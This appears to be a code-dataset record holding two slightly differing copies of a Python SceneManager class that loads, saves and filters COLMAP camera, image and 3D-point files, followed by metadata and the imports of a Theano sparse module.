with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.cameras)))
camera_struct = struct.Struct("IiLL")
for camera_id, camera in sorted(self.cameras.items()):
fid.write(
camera_struct.pack(
camera_id, camera.camera_type, camera.width, camera.height
)
)
# TODO (True): should move this into the Camera class
fid.write(camera.get_params().tobytes())
def _save_cameras_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Camera list with one line of data per camera:", file=fid)
print("# CAMERA_ID, MODEL, WIDTH, HEIGHT, PARAMS[]", file=fid)
print("# Number of cameras:", len(self.cameras), file=fid)
for camera_id, camera in sorted(self.cameras.items()):
print(camera_id, camera, file=fid)
# ---------------------------------------------------------------------------
def save_images(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "images.bin" if binary else "images.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_images_bin(output_file)
else:
self._save_images_txt(output_file)
def _save_images_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.images)))
for image_id, image in self.images.items():
fid.write(struct.pack("I", image_id))
fid.write(image.q.q.tobytes())
fid.write(image.tvec.tobytes())
fid.write(struct.pack("I", image.camera_id))
            fid.write(image.name.encode() + b"\x00")  # name is str; a binary file needs bytes
fid.write(struct.pack("L", len(image.points2D)))
data = np.rec.fromarrays(
(image.points2D[:, 0], image.points2D[:, 1], image.point3D_ids)
)
fid.write(data.tobytes())
def _save_images_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Image list with two lines of data per image:", file=fid)
print("# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME", file=fid)
print("# POINTS2D[] as (X, Y, POINT3D_ID)", file=fid)
print("# Number of images: {},".format(len(self.images)), file=fid)
print("# mean observations per image: unknown", file=fid)
for image_id, image in self.images.items():
print(image_id, file=fid)
print(" ".join(str(qi) for qi in image.q.q), file=fid)
print(" ".join(str(ti) for ti in image.tvec), file=fid)
print(image.camera_id, image.name, file=fid)
data = np.rec.fromarrays(
(
image.points2D[:, 0],
image.points2D[:, 1],
image.point3D_ids.astype(np.int64),
)
)
            # Python 3 text-mode files reject relative seeks, so build the
            # points row explicitly instead of rewinding over savetxt output.
            print(" ".join("%.2f %.2f %d" % tuple(row) for row in data), file=fid)
# ---------------------------------------------------------------------------
def save_points3D(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "points3D.bin" if binary else "points3D.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_points3D_bin(output_file)
else:
self._save_points3D_txt(output_file)
def _save_points3D_bin(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", num_valid_points3D))
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
fid.write(struct.pack("L", point3D_id))
fid.write(self.points3D[point3D_idx].tobytes())
fid.write(self.point3D_colors[point3D_idx].tobytes())
fid.write(self.point3D_errors[point3D_idx].tobytes())
fid.write(struct.pack("L", len(self.point3D_id_to_images[point3D_id])))
fid.write(self.point3D_id_to_images[point3D_id].tobytes())
def _save_points3D_txt(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
array_to_string = lambda arr: " ".join(str(x) for x in arr)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "w") as fid:
print("# 3D point list with one line of data per point:", file=fid)
print("# POINT3D_ID, X, Y, Z, R, G, B, ERROR, TRACK[] as ", file=fid)
print("# (IMAGE_ID, POINT2D_IDX)", file=fid)
print("# Number of points: {},".format(num_valid_points3D), file=fid)
print("# mean track length: unknown", file=fid)
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
print(point3D_id, file=fid)
print(array_to_string(self.points3D[point3D_idx]), file=fid)
print(array_to_string(self.point3D_colors[point3D_idx]), file=fid)
print(self.point3D_errors[point3D_idx], file=fid)
print(
array_to_string(self.point3D_id_to_images[point3D_id].flat),
file=fid,
)
# ---------------------------------------------------------------------------
# return the image id associated with a given image file
def get_image_from_name(self, image_name):
image_id = self.name_to_image_id[image_name]
return image_id, self.images[image_id]
# ---------------------------------------------------------------------------
def get_camera(self, camera_id):
return self.cameras[camera_id]
# ---------------------------------------------------------------------------
def get_points3D(self, image_id, return_points2D=True, return_colors=False):
image = self.images[image_id]
mask = image.point3D_ids != SceneManager.INVALID_POINT3D
point3D_idxs = np.array(
[
self.point3D_id_to_point3D_idx[point3D_id]
for point3D_id in image.point3D_ids[mask]
]
)
# detect filtered points
filter_mask = point3D_idxs != SceneManager.INVALID_POINT3D
point3D_idxs = point3D_idxs[filter_mask]
result = [self.points3D[point3D_idxs, :]]
if return_points2D:
mask[mask] &= filter_mask
result += [image.points2D[mask]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
def point3D_valid(self, point3D_id):
return (
self.point3D_id_to_point3D_idx[point3D_id] != SceneManager.INVALID_POINT3D
)
# ---------------------------------------------------------------------------
def get_filtered_points3D(self, return_colors=False):
point3D_idxs = [
idx
for idx in self.point3D_id_to_point3D_idx.values()
if idx != SceneManager.INVALID_POINT3D
]
result = [self.points3D[point3D_idxs, :]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
# return 3D points shared by two images
def get_shared_points3D(self, image_id1, image_id2):
point3D_ids = set(self.images[image_id1].point3D_ids) & set(
self.images[image_id2].point3D_ids
)
point3D_ids.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = np.array(
[self.point3D_id_to_point3D_idx[point3D_id] for point3D_id in point3D_ids]
)
return self.points3D[point3D_idxs, :]
# ---------------------------------------------------------------------------
# project *all* 3D points into image, return their projection coordinates,
# as well as their 3D positions
def get_viewed_points(self, image_id):
image = self.images[image_id]
# get unfiltered points
point3D_idxs = set(self.point3D_id_to_point3D_idx.values())
point3D_idxs.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = list(point3D_idxs)
points3D = self.points3D[point3D_idxs, :]
# orient points relative to camera
R = image.q.ToR()
points3D = points3D.dot(R.T) + image.tvec[np.newaxis, :]
points3D = points3D[points3D[:, 2] > 0, :] # keep points with positive z
# put points into image coordinates
camera = self.cameras[image.camera_id]
points2D = points3D.dot(camera.get_camera_matrix().T)
points2D = points2D[:, :2] / points2D[:, 2][:, np.newaxis]
# keep points that are within the image
mask = (
(points2D[:, 0] >= 0)
& (points2D[:, 1] >= 0)
& (points2D[:, 0] < camera.width - 1)
& (points2D[:, 1] < camera.height - 1)
)
return points2D[mask, :], points3D[mask, :]
# ---------------------------------------------------------------------------
def add_camera(self, camera):
self.last_camera_id += 1
self.cameras[self.last_camera_id] = camera
return self.last_camera_id
# ---------------------------------------------------------------------------
def add_image(self, image):
self.last_image_id += 1
self.images[self.last_image_id] = image
return self.last_image_id
# ---------------------------------------------------------------------------
def delete_images(self, image_list):
# delete specified images
for image_id in image_list:
if image_id in self.images:
del self.images[image_id]
    keep_set = set(self.images.keys())  # dict.iterkeys() is Python 2 only
# delete references to specified images, and ignore any points that are
# invalidated
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
mask = np.array(
[
image_id in keep_set
for image_id in self.point3D_id_to_images[point3D_id][:, 0]
]
)
if np.any(mask):
self.point3D_id_to_images[point3D_id] = self.point3D_id_to_images[
point3D_id
][mask]
else:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
# camera_list: set of cameras whose points we'd like to keep
# min/max triangulation angle: in degrees
def filter_points3D(
self,
min_track_len=0,
max_error=np.inf,
min_tri_angle=0,
max_tri_angle=180,
image_set=set(),
):
image_set = set(image_set)
check_triangulation_angles = min_tri_angle > 0 or max_tri_angle < 180
if check_triangulation_angles:
max_tri_prod = np.cos(np.radians(min_tri_angle))
min_tri_prod = np.cos(np.radians(max_tri_angle))
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
image_ids = []
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
if image_set or min_track_len > 0:
image_ids = set(self.point3D_id_to_images[point3D_id][:, 0])
# check if error and min track length are sufficient, or if none of
# the selected cameras see the point
if (
len(image_ids) < min_track_len
or self.point3D_errors[point3D_idx] > max_error
or image_set
and image_set.isdisjoint(image_ids)
):
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# find dot product between all camera viewing rays
elif check_triangulation_angles:
xyz = self.points3D[point3D_idx, :]
tvecs = np.array(
[(self.images[image_id].tvec - xyz) for image_id in image_ids]
)
tvecs /= np.linalg.norm(tvecs, axis=-1)[:, np.newaxis]
cos_theta = np.array([u.dot(v) for u, v in combinations(tvecs, 2)])
# min_prod = cos(maximum viewing angle), and vice versa
# if maximum viewing angle is too small or too large,
# don't add this point
if np.min(cos_theta) > max_tri_prod or np.max(cos_theta) < min_tri_prod:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# apply the filters to the image point3D_ids
for image in self.images.values():
mask = np.array(
[
self.point3D_id_to_point3D_idx.get(point3D_id, 0)
== SceneManager.INVALID_POINT3D
for point3D_id in image.point3D_ids
]
)
image.point3D_ids[mask] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
    # scene graph: {image_id: {other_image_id: number of shared points}}
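    # e.g. scene_graph[3][7] == 42 means images 3 and 7 share 42 3D points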
def build_scene_graph(self):
self.scene_graph = defaultdict(lambda: defaultdict(int))
point3D_iter = self.point3D_id_to_images.items()
for i, (point3D_id, images) in enumerate(point3D_iter):
if not self.point3D_valid(point3D_id):
continue
for image_id1, image_id2 in combinations(images[:, 0], 2):
self.scene_graph[image_id1][image_id2] += 1
self.scene_graph[image_id2][image_id1] += 1
| 38.947977
| 88
| 0.532762
|
from collections import OrderedDict, defaultdict
from io import StringIO
from itertools import combinations
import os
import struct
from .camera import Camera
from .image import Image
import numpy as np
from .rotation import Quaternion
class SceneManager:
INVALID_POINT3D = np.uint64(-1)
def __init__(self, colmap_results_folder, image_path=None):
self.folder = colmap_results_folder
if not self.folder.endswith("/"):
self.folder += "/"
self.image_path = None
self.load_colmap_project_file(image_path=image_path)
self.cameras = OrderedDict()
self.images = OrderedDict()
self.name_to_image_id = dict()
self.last_camera_id = 0
self.last_image_id = 0
self.points3D = np.zeros((0, 3))
# for each element in points3D, stores the id of the point
self.point3D_ids = np.empty(0)
# point3D_id => index in self.points3D
self.point3D_id_to_point3D_idx = dict()
# point3D_id => [(image_id, point2D idx in image)]
self.point3D_id_to_images = dict()
self.point3D_colors = np.zeros((0, 3), dtype=np.uint8)
self.point3D_errors = np.zeros(0)
# ---------------------------------------------------------------------------
def load_colmap_project_file(self, project_file=None, image_path=None):
if project_file is None:
project_file = self.folder + "project.ini"
self.image_path = image_path
if self.image_path is None:
try:
with open(project_file, "r") as f:
for line in iter(f.readline, ""):
if line.startswith("image_path"):
self.image_path = line[11:].strip()
break
            except OSError:
                pass
if self.image_path is None:
print("Warning: image_path not found for reconstruction")
elif not self.image_path.endswith("/"):
self.image_path += "/"
# ---------------------------------------------------------------------------
def load(self):
self.load_cameras()
self.load_images()
self.load_points3D()
# ---------------------------------------------------------------------------
def load_cameras(self, input_file=None):
if input_file is None:
input_file = self.folder + "cameras.bin"
if os.path.exists(input_file):
self._load_cameras_bin(input_file)
else:
input_file = self.folder + "cameras.txt"
if os.path.exists(input_file):
self._load_cameras_txt(input_file)
else:
raise IOError("no cameras file found")
def _load_cameras_bin(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "rb") as f:
num_cameras = struct.unpack("L", f.read(8))[0]
for _ in range(num_cameras):
camera_id, camera_type, w, h = struct.unpack("IiLL", f.read(24))
num_params = Camera.GetNumParams(camera_type)
params = struct.unpack("d" * num_params, f.read(8 * num_params))
self.cameras[camera_id] = Camera(camera_type, w, h, params)
self.last_camera_id = max(self.last_camera_id, camera_id)
def _load_cameras_txt(self, input_file):
self.cameras = OrderedDict()
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
camera_id = int(data[0])
self.cameras[camera_id] = Camera(
data[1], int(data[2]), int(data[3]), list(map(float, data[4:]))
)
self.last_camera_id = max(self.last_camera_id, camera_id)
# ---------------------------------------------------------------------------
def load_images(self, input_file=None):
if input_file is None:
input_file = self.folder + "images.bin"
if os.path.exists(input_file):
self._load_images_bin(input_file)
else:
input_file = self.folder + "images.txt"
if os.path.exists(input_file):
self._load_images_txt(input_file)
else:
raise IOError("no images file found")
def _load_images_bin(self, input_file):
self.images = OrderedDict()
with open(input_file, "rb") as f:
num_images = struct.unpack("L", f.read(8))[0]
for _ in range(num_images):
image_id = struct.unpack("I", f.read(4))[0]
q = Quaternion(np.array(struct.unpack("dddd", f.read(32))))
t = np.array(struct.unpack("ddd", f.read(24)))
camera_id = struct.unpack("I", f.read(4))[0]
name = b"".join(c for c in iter(lambda: f.read(1), b"\x00")).decode()
image = Image(name, camera_id, q, t)
num_points2D = struct.unpack("L", f.read(8))[0]
image.points2D = np.empty((num_points2D, 2))
image.point3D_ids = np.empty(num_points2D, dtype=np.uint64)
for j in range(num_points2D):
image.points2D[j] = np.array(struct.unpack("dd", f.read(16)))
image.point3D_ids[j] = np.array(struct.unpack("Q", f.read(8)))
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
def _load_images_txt(self, input_file):
self.images = OrderedDict()
with open(input_file, "r") as f:
is_camera_description_line = False
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
is_camera_description_line = not is_camera_description_line
data = line.split()
if is_camera_description_line:
image_id = int(data[0])
image = Image(
data[-1],
int(data[-2]),
Quaternion(np.array(list(map(float, data[1:5])))),
np.array(list(map(float, data[5:8]))),
)
else:
image.points2D = np.array(
[list(map(float, data[::3])), list(map(float, data[1::3]))]
).T
image.point3D_ids = np.array(list(map(np.uint64, data[2::3])))
# automatically remove points without an associated 3D point
# mask = (image.point3D_ids != SceneManager.INVALID_POINT3D)
# image.points2D = image.points2D[mask]
# image.point3D_ids = image.point3D_ids[mask]
self.images[image_id] = image
self.name_to_image_id[image.name] = image_id
self.last_image_id = max(self.last_image_id, image_id)
# ---------------------------------------------------------------------------
def load_points3D(self, input_file=None):
if input_file is None:
input_file = self.folder + "points3D.bin"
if os.path.exists(input_file):
self._load_points3D_bin(input_file)
else:
input_file = self.folder + "points3D.txt"
if os.path.exists(input_file):
self._load_points3D_txt(input_file)
else:
raise IOError("no points3D file found")
def _load_points3D_bin(self, input_file):
with open(input_file, "rb") as f:
num_points3D = struct.unpack("L", f.read(8))[0]
self.points3D = np.empty((num_points3D, 3))
self.point3D_ids = np.empty(num_points3D, dtype=np.uint64)
self.point3D_colors = np.empty((num_points3D, 3), dtype=np.uint8)
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = np.empty(num_points3D)
for i in range(num_points3D):
self.point3D_ids[i] = struct.unpack("L", f.read(8))[0]
self.points3D[i] = struct.unpack("ddd", f.read(24))
self.point3D_colors[i] = struct.unpack("BBB", f.read(3))
self.point3D_errors[i] = struct.unpack("d", f.read(8))[0]
self.point3D_id_to_point3D_idx[self.point3D_ids[i]] = i
# load (image id, point2D idx) pairs
track_len = struct.unpack("L", f.read(8))[0]
data = struct.unpack("I" * (2 * track_len), f.read(2 * track_len * 4))
self.point3D_id_to_images[self.point3D_ids[i]] = np.array(
data, dtype=np.uint32
).reshape(track_len, 2)
def _load_points3D_txt(self, input_file):
self.points3D = []
self.point3D_ids = []
self.point3D_colors = []
self.point3D_id_to_point3D_idx = dict()
self.point3D_id_to_images = dict()
self.point3D_errors = []
with open(input_file, "r") as f:
for line in iter(lambda: f.readline().strip(), ""):
if not line or line.startswith("#"):
continue
data = line.split()
point3D_id = np.uint64(data[0])
self.point3D_ids.append(point3D_id)
self.point3D_id_to_point3D_idx[point3D_id] = len(self.points3D)
self.points3D.append(list(map(np.float64, data[1:4])))
self.point3D_colors.append(list(map(np.uint8, data[4:7])))
self.point3D_errors.append(np.float64(data[7]))
# load (image id, point2D idx) pairs
self.point3D_id_to_images[point3D_id] = np.array(
list(map(np.uint32, data[8:]))
).reshape(-1, 2)
self.points3D = np.array(self.points3D)
self.point3D_ids = np.array(self.point3D_ids)
self.point3D_colors = np.array(self.point3D_colors)
self.point3D_errors = np.array(self.point3D_errors)
# ---------------------------------------------------------------------------
def save(self, output_folder, binary=True):
self.save_cameras(output_folder, binary=binary)
self.save_images(output_folder, binary=binary)
self.save_points3D(output_folder, binary=binary)
# ---------------------------------------------------------------------------
def save_cameras(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "cameras.bin" if binary else "cameras.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_cameras_bin(output_file)
else:
self._save_cameras_txt(output_file)
def _save_cameras_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.cameras)))
camera_struct = struct.Struct("IiLL")
for camera_id, camera in sorted(self.cameras.items()):
fid.write(
camera_struct.pack(
camera_id, camera.camera_type, camera.width, camera.height
)
)
# TODO (True): should move this into the Camera class
fid.write(camera.get_params().tobytes())
def _save_cameras_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Camera list with one line of data per camera:", file=fid)
print("# CAMERA_ID, MODEL, WIDTH, HEIGHT, PARAMS[]", file=fid)
print("# Number of cameras:", len(self.cameras), file=fid)
for camera_id, camera in sorted(self.cameras.items()):
print(camera_id, camera, file=fid)
# ---------------------------------------------------------------------------
def save_images(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "images.bin" if binary else "images.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_images_bin(output_file)
else:
self._save_images_txt(output_file)
def _save_images_bin(self, output_file):
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", len(self.images)))
for image_id, image in self.images.items():
fid.write(struct.pack("I", image_id))
fid.write(image.q.q.tobytes())
fid.write(image.tvec.tobytes())
fid.write(struct.pack("I", image.camera_id))
                fid.write(image.name.encode() + b"\x00")  # null-terminated name
fid.write(struct.pack("L", len(image.points2D)))
data = np.rec.fromarrays(
(image.points2D[:, 0], image.points2D[:, 1], image.point3D_ids)
)
fid.write(data.tobytes())
def _save_images_txt(self, output_file):
with open(output_file, "w") as fid:
print("# Image list with two lines of data per image:", file=fid)
print("# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME", file=fid)
print("# POINTS2D[] as (X, Y, POINT3D_ID)", file=fid)
print("# Number of images: {},".format(len(self.images)), file=fid)
print("# mean observations per image: unknown", file=fid)
            for image_id, image in self.images.items():
                # COLMAP expects the whole pose on one line:
                # IMAGE_ID QW QX QY QZ TX TY TZ CAMERA_ID NAME
                print(
                    image_id,
                    " ".join(str(qi) for qi in image.q.q),
                    " ".join(str(ti) for ti in image.tvec),
                    image.camera_id,
                    image.name,
                    file=fid,
                )
data = np.rec.fromarrays(
(
image.points2D[:, 0],
image.points2D[:, 1],
image.point3D_ids.astype(np.int64),
)
)
                if len(data) > 0:
                    # text-mode files don't support relative seek() in
                    # Python 3, so strip the trailing separator via a buffer
                    buf = StringIO()
                    np.savetxt(buf, data, "%.2f %.2f %d", newline=" ")
                    fid.write(buf.getvalue().rstrip())
                fid.write("\n")
# ---------------------------------------------------------------------------
def save_points3D(self, output_folder, output_file=None, binary=True):
if not os.path.exists(output_folder):
os.makedirs(output_folder)
if output_file is None:
output_file = "points3D.bin" if binary else "points3D.txt"
output_file = os.path.join(output_folder, output_file)
if binary:
self._save_points3D_bin(output_file)
else:
self._save_points3D_txt(output_file)
def _save_points3D_bin(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "wb") as fid:
fid.write(struct.pack("L", num_valid_points3D))
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
fid.write(struct.pack("L", point3D_id))
fid.write(self.points3D[point3D_idx].tobytes())
fid.write(self.point3D_colors[point3D_idx].tobytes())
fid.write(self.point3D_errors[point3D_idx].tobytes())
fid.write(struct.pack("L", len(self.point3D_id_to_images[point3D_id])))
fid.write(self.point3D_id_to_images[point3D_id].tobytes())
def _save_points3D_txt(self, output_file):
num_valid_points3D = sum(
1
for point3D_idx in self.point3D_id_to_point3D_idx.values()
if point3D_idx != SceneManager.INVALID_POINT3D
)
array_to_string = lambda arr: " ".join(str(x) for x in arr)
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
with open(output_file, "w") as fid:
print("# 3D point list with one line of data per point:", file=fid)
print("# POINT3D_ID, X, Y, Z, R, G, B, ERROR, TRACK[] as ", file=fid)
print("# (IMAGE_ID, POINT2D_IDX)", file=fid)
print("# Number of points: {},".format(num_valid_points3D), file=fid)
print("# mean track length: unknown", file=fid)
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
                # COLMAP expects the whole point on one line:
                # POINT3D_ID X Y Z R G B ERROR TRACK[]
                print(
                    point3D_id,
                    array_to_string(self.points3D[point3D_idx]),
                    array_to_string(self.point3D_colors[point3D_idx]),
                    self.point3D_errors[point3D_idx],
                    array_to_string(self.point3D_id_to_images[point3D_id].flat),
                    file=fid,
                )
# ---------------------------------------------------------------------------
    # return the image id and Image associated with a given image filename
def get_image_from_name(self, image_name):
image_id = self.name_to_image_id[image_name]
return image_id, self.images[image_id]
# ---------------------------------------------------------------------------
def get_camera(self, camera_id):
return self.cameras[camera_id]
# ---------------------------------------------------------------------------
def get_points3D(self, image_id, return_points2D=True, return_colors=False):
image = self.images[image_id]
mask = image.point3D_ids != SceneManager.INVALID_POINT3D
point3D_idxs = np.array(
[
self.point3D_id_to_point3D_idx[point3D_id]
for point3D_id in image.point3D_ids[mask]
]
)
# detect filtered points
filter_mask = point3D_idxs != SceneManager.INVALID_POINT3D
point3D_idxs = point3D_idxs[filter_mask]
result = [self.points3D[point3D_idxs, :]]
if return_points2D:
mask[mask] &= filter_mask
result += [image.points2D[mask]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
def point3D_valid(self, point3D_id):
return (
self.point3D_id_to_point3D_idx[point3D_id] != SceneManager.INVALID_POINT3D
)
# ---------------------------------------------------------------------------
def get_filtered_points3D(self, return_colors=False):
point3D_idxs = [
idx
for idx in self.point3D_id_to_point3D_idx.values()
if idx != SceneManager.INVALID_POINT3D
]
result = [self.points3D[point3D_idxs, :]]
if return_colors:
result += [self.point3D_colors[point3D_idxs, :]]
return result if len(result) > 1 else result[0]
# ---------------------------------------------------------------------------
# return 3D points shared by two images
def get_shared_points3D(self, image_id1, image_id2):
point3D_ids = set(self.images[image_id1].point3D_ids) & set(
self.images[image_id2].point3D_ids
)
point3D_ids.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = np.array(
[self.point3D_id_to_point3D_idx[point3D_id] for point3D_id in point3D_ids]
)
return self.points3D[point3D_idxs, :]
# ---------------------------------------------------------------------------
# project *all* 3D points into image, return their projection coordinates,
# as well as their 3D positions
def get_viewed_points(self, image_id):
image = self.images[image_id]
# get unfiltered points
point3D_idxs = set(self.point3D_id_to_point3D_idx.values())
point3D_idxs.discard(SceneManager.INVALID_POINT3D)
point3D_idxs = list(point3D_idxs)
points3D = self.points3D[point3D_idxs, :]
# orient points relative to camera
R = image.q.ToR()
points3D = points3D.dot(R.T) + image.tvec[np.newaxis, :]
points3D = points3D[points3D[:, 2] > 0, :] # keep points with positive z
# put points into image coordinates
camera = self.cameras[image.camera_id]
points2D = points3D.dot(camera.get_camera_matrix().T)
points2D = points2D[:, :2] / points2D[:, 2][:, np.newaxis]
# keep points that are within the image
mask = (
(points2D[:, 0] >= 0)
& (points2D[:, 1] >= 0)
& (points2D[:, 0] < camera.width - 1)
& (points2D[:, 1] < camera.height - 1)
)
return points2D[mask, :], points3D[mask, :]
# ---------------------------------------------------------------------------
def add_camera(self, camera):
self.last_camera_id += 1
self.cameras[self.last_camera_id] = camera
return self.last_camera_id
# ---------------------------------------------------------------------------
def add_image(self, image):
self.last_image_id += 1
self.images[self.last_image_id] = image
return self.last_image_id
# ---------------------------------------------------------------------------
def delete_images(self, image_list):
# delete specified images
for image_id in image_list:
if image_id in self.images:
del self.images[image_id]
        keep_set = set(self.images.keys())  # iterkeys() is Python 2 only
# delete references to specified images, and ignore any points that are
# invalidated
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
mask = np.array(
[
image_id in keep_set
for image_id in self.point3D_id_to_images[point3D_id][:, 0]
]
)
if np.any(mask):
self.point3D_id_to_images[point3D_id] = self.point3D_id_to_images[
point3D_id
][mask]
else:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
    # image_set: set of image ids whose points we'd like to keep
def filter_points3D(
self,
min_track_len=0,
max_error=np.inf,
min_tri_angle=0,
max_tri_angle=180,
image_set=set(),
):
image_set = set(image_set)
check_triangulation_angles = min_tri_angle > 0 or max_tri_angle < 180
if check_triangulation_angles:
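            # cos() decreases on [0, 180] degrees, so the minimum allowed
            # angle gives the maximum allowed dot product, and vice versa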
max_tri_prod = np.cos(np.radians(min_tri_angle))
min_tri_prod = np.cos(np.radians(max_tri_angle))
iter_point3D_id_to_point3D_idx = self.point3D_id_to_point3D_idx.items()
image_ids = []
for point3D_id, point3D_idx in iter_point3D_id_to_point3D_idx:
if point3D_idx == SceneManager.INVALID_POINT3D:
continue
if image_set or min_track_len > 0:
image_ids = set(self.point3D_id_to_images[point3D_id][:, 0])
if (
len(image_ids) < min_track_len
or self.point3D_errors[point3D_idx] > max_error
or image_set
and image_set.isdisjoint(image_ids)
):
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
elif check_triangulation_angles:
xyz = self.points3D[point3D_idx, :]
tvecs = np.array(
[(self.images[image_id].tvec - xyz) for image_id in image_ids]
)
tvecs /= np.linalg.norm(tvecs, axis=-1)[:, np.newaxis]
cos_theta = np.array([u.dot(v) for u, v in combinations(tvecs, 2)])
if np.min(cos_theta) > max_tri_prod or np.max(cos_theta) < min_tri_prod:
self.point3D_id_to_point3D_idx[
point3D_id
] = SceneManager.INVALID_POINT3D
# apply the filters to the image point3D_ids
for image in self.images.values():
mask = np.array(
[
self.point3D_id_to_point3D_idx.get(point3D_id, 0)
== SceneManager.INVALID_POINT3D
for point3D_id in image.point3D_ids
]
)
image.point3D_ids[mask] = SceneManager.INVALID_POINT3D
# ---------------------------------------------------------------------------
    # scene graph: {image_id: {other_image_id: number of shared points}}
def build_scene_graph(self):
self.scene_graph = defaultdict(lambda: defaultdict(int))
point3D_iter = self.point3D_id_to_images.items()
for i, (point3D_id, images) in enumerate(point3D_iter):
if not self.point3D_valid(point3D_id):
continue
for image_id1, image_id2 in combinations(images[:, 0], 2):
self.scene_graph[image_id1][image_id2] += 1
self.scene_graph[image_id2][image_id1] += 1
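A minimal usage sketch of the SceneManager class above; the reconstruction
path, output path, and filter thresholds are illustrative assumptions rather
than values from the original file:

if __name__ == "__main__":
    # load a COLMAP sparse model (binary files preferred, text as fallback)
    sm = SceneManager("./sparse/0/")
    sm.load()
    # drop weakly observed or high-error points, then build the image-pair
    # co-visibility graph and write the filtered model back out
    sm.filter_points3D(min_track_len=3, max_error=2.0, min_tri_angle=1.5)
    sm.build_scene_graph()
    sm.save("./sparse/filtered/", binary=True)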
| true
| true
|
f70b8176857a7599c2af9d3e6c1fa9b31a2be0ce
| 1,151
|
py
|
Python
|
theano/sparse/sharedvar.py
|
MarcCote/Theano
|
f0d293161a624ccf10c60ee8405a92e7d321151a
|
[
"BSD-3-Clause"
] | 95
|
2019-05-14T20:55:26.000Z
|
2022-03-26T13:32:42.000Z
|
theano/sparse/sharedvar.py
|
MarcCote/Theano
|
f0d293161a624ccf10c60ee8405a92e7d321151a
|
[
"BSD-3-Clause"
] | 7
|
2019-11-25T08:24:47.000Z
|
2021-09-12T13:29:14.000Z
|
theano/sparse/sharedvar.py
|
MarcCote/Theano
|
f0d293161a624ccf10c60ee8405a92e7d321151a
|
[
"BSD-3-Clause"
] | 30
|
2016-10-27T21:59:00.000Z
|
2021-02-20T09:55:14.000Z
|
from __future__ import absolute_import, print_function, division
import copy
import scipy.sparse
from theano.compile import shared_constructor, SharedVariable
from theano.sparse.basic import SparseType, _sparse_py_operators
